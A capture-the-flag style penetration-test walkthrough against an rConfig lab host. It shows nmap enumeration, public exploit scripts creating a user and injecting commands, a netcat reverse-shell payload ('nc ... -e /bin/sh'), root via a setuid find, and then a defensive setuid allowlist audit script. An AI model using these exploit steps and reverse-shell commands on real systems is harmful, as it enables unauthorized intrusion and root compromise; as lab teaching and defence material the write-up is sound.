Enumeration
Network Scan with Nmap
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
8081/tcp open  blackice-icecap
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.49.194
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
|   256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
|_  256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: 400 Bad Request

Points to carry into exploitation: anonymous FTP login is accepted, but the directory listing timed out and FTP is not used again in this writeup; TRACE is enabled on port 80, which otherwise serves only the stock CentOS test page; MariaDB on 3306 refuses unauthorized connections. The "blackice-icecap" label in the first scan is just nmap's default service name for port 8081; the version scan shows it is Apache, and the 400 Bad Request title is Apache's reply to a plain-HTTP probe on a TLS-enabled port. That HTTPS service on 8081 is rConfig, which the exploits below target at https://192.168.194.57:8081/.

Exploitation
Initial Access
Search for known exploits for rConfig, the application served over HTTPS on port 8081:
$ searchsploit rconfig
rConfig 3.9.5 - Remote Code Execution (Unauthenticated)                   | php/webapps/48878.py
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection               | php/webapps/48241.py
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution | php/webapps/48261.py
rConfig 3.9.4 | Remote Code Execution
Create a user with the 48878.py exploit.

Note: play with the payload. It may be possible to get a shell from this exploit alone.

$ python3 48878.py
Connecting to: https://192.168.194.57:8081/
Connect back is set to: nc 192.168.49.194 3306 -e /bin/sh, please launch 'nc -lv 9001'
Version is rConfig Version 3.9.4 it may not be vulnerable
Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón
In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)
Note: preferred method for auth bypass is 1, because it is less 'invasive'
Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine
Choose method for authentication bypass:
1) User creation
2) User enumeration + User edit
Method>1
(+) User test created

The script warns that the target reports 3.9.4 rather than the 3.9.5 it was written for, but the user-creation stage still succeeds. Its RCE stage is not relied on here (the "Connect back" line only echoes the payload configured in the script); instead, the new account is fed to 48241.py, the authenticated 'search.crud.php' command injection written for 3.9.4. Use 48241.py to get a shell with the credentials the previous exploit created (user test, password Testing1@):
$ python3 48241.py https://192.168.194.57:8081 test Testing1@ 192.168.49.194 8081

The arguments are, in order: target URL, username, password, listener host, listener port. Start the listener before running the script, because the injected command connects back immediately:
$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [192.168.49.194] from (UNKNOWN) [192.168.194.57] 49986
sh-4.2$

Privilege Escalation
SUID misconfiguration
bash-4.2$ find / -type f -perm /4000 2>/dev/null
/usr/bin/find
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper

Every entry in that list is a stock setuid helper on CentOS 7 except /usr/bin/find. A setuid find runs whatever -exec hands it with an effective UID of root; bash -p keeps that effective UID instead of dropping back to the real one, and -quit stops find after the first match so only one shell is spawned:

bash-4.2$ find . -exec /bin/bash -p \; -quit
bash-4.2# cd /root
bash-4.2# cat proof.txt
873329b70d9edf1b88c3434906594602
bash-4.2# cat /home/rconfig/lo
local.txt  logs/
bash-4.2# cat /home/rconfig/local.txt
0a805fb0a86e65de55c9fc587b9b69f6
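The defender's side of the same finding, as an added example that is not part of the original writeup: a POSIX sh audit that diffs a host's setuid files against an allowlist of helpers that legitimately carry the bit on a stock CentOS 7 install and reports the rest, so a stray setuid find stands out. The allowlist and the embedded sample listing are assumptions reconstructed from the find output above, not an authoritative list for every distribution.

```sh
#!/bin/sh
# Added example (not from the original writeup): audit setuid binaries against
# an allowlist and flag anything outside it. The allowlist below is an
# assumption based on a stock CentOS 7 host; adjust it per baseline image.
EXPECTED_SUID="/usr/bin/chage /usr/bin/gpasswd /usr/bin/chfn /usr/bin/chsh
/usr/bin/newgrp /usr/bin/su /usr/bin/sudo /usr/bin/mount /usr/bin/umount
/usr/bin/crontab /usr/bin/pkexec /usr/bin/passwd /usr/bin/fusermount
/usr/sbin/unix_chkpwd /usr/sbin/pam_timestamp_check /usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper"

# Constructed sample input: the setuid listing taken from the target above,
# one path per line, so the audit can be exercised offline.
SAMPLE_SUID_LIST="/usr/bin/find
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper"

# is_expected PATH: succeed if PATH is on the allowlist.
is_expected() {
  for e in $EXPECTED_SUID; do
    [ "$1" = "$e" ] && return 0
  done
  return 1
}

# unexpected_suid: read one path per line on stdin, print those not allowlisted.
unexpected_suid() {
  while IFS= read -r p; do
    [ -n "$p" ] || continue
    is_expected "$p" || printf '%s\n' "$p"
  done
}

# live_suid_list: the same enumeration the writeup ran on the target
# (-perm -4000 and -perm /4000 are equivalent for a single bit).
live_suid_list() {
  find / -type f -perm -4000 2>/dev/null
}

# fix_suid PATH: strip the setuid bit. Dry run unless FIX=1 is set.
fix_suid() {
  if [ "${FIX:-0}" = "1" ]; then
    chmod u-s "$1"
  else
    printf 'would run: chmod u-s %s\n' "$1"
  fi
}

# Usage: sh suid_audit.sh          -> audit the constructed sample
#        sh suid_audit.sh --live   -> audit this host (FIX=1 to actually chmod)
case "${1:-}" in
  --live) live_suid_list ;;
  *)      printf '%s\n' "$SAMPLE_SUID_LIST" ;;
esac | unexpected_suid | while IFS= read -r bad; do
  printf 'unexpected setuid binary: %s\n' "$bad"
  fix_suid "$bad"
done
```

Run against the sample the only line reported is /usr/bin/find, which is exactly the binary the privilege escalation above abused. Running the audit from a cron job or a configuration-management check, with the allowlist pinned to the golden image, turns this class of misconfiguration into a detectable drift rather than a finding a tester makes for you.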